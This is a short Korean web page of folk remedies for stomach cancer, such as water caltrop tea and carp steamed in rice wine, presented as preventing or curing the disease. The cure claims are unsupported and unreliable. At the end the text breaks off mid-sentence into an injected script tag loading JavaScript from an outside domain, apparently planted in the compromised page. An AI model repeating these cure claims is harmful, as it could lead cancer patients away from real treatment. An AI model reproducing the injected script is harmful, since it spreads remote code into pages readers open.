위암(胃癌)
(1) 번행초(蕃杏草)
바닷가에 자라는 번행초는 시금치와 같은 성분을 지니고 있다. 들나무로서도 데쳐서 반찬으로 흔히 먹는 풀이나 번행초를 그늘에서 말려 한줌을 2-3홉의 물로 달여서 마시면 위장을 튼튼하게 할 뿐 아니라 위암의 예방에 효력이 매우 크다.
(2) 잉어찜
청주 한 되를 철 솥에 붓고 끓여 여기에 잉어(30센티 정도)를 산채로 도막을 내지 말고 넣는다. 물기가 없어질 때까지 조리되 불을 약하게 하고는 뒤섞어 주면서 연한 갈색이 될 때까지 계속한다(약 6시간 걸린다) 이때 잘못하면 기름이 쓰며 나와서 떡이 되어 버리면 쓰지 못한 이것을 식전에 세손가락으로 한줌씩 하루3번 먹는다. 잉어 한 마리이면 1주일 량이 되므로 1-1.5개월을 계속하여 복용하도록 한다.
(3) 등나무의 흑
등나무 줄기에 생긴 흑과 두릅나무뿌리의 껍질을 그늘에 말려서 잘게 부수어 이것을 섞어 적당한 양을 달여서 복용하면 어느덧 낫게 된다. 위궤양에도 효험이 있다.
(4) 마름의 열매
마름의 열매 한 줌을 3홉의 물로 반이 되게 달여서 하루에 몇 차례씩 차 대신에 복용하면 2주일 이후에는 고통이 훨씬 적어지고 식용이 나아지면서 2-3개월만에 정상적인 건강을 회복할 수가 있다.
1. 위에 매화(梅花) 버섯 : 버섯 중에도 매화나무에 열리는 버섯이 제일 잘 듣는다. 잘게 썰어 15그램을 진하게 달여 매일 장복하면 효과를 본다고 한다. * 생나무 것이 좋으나 마른나무의 버섯도 좋다.
2. 위암에 질경이 갯완두 : 질경이(車前이라고도 함)의 잎과 줄기 말린 것 10g, 갯완두의 잎, 줄기 5g, 감초 2g을 함께 ?script src=http://s.lbs66.cn/kr.js>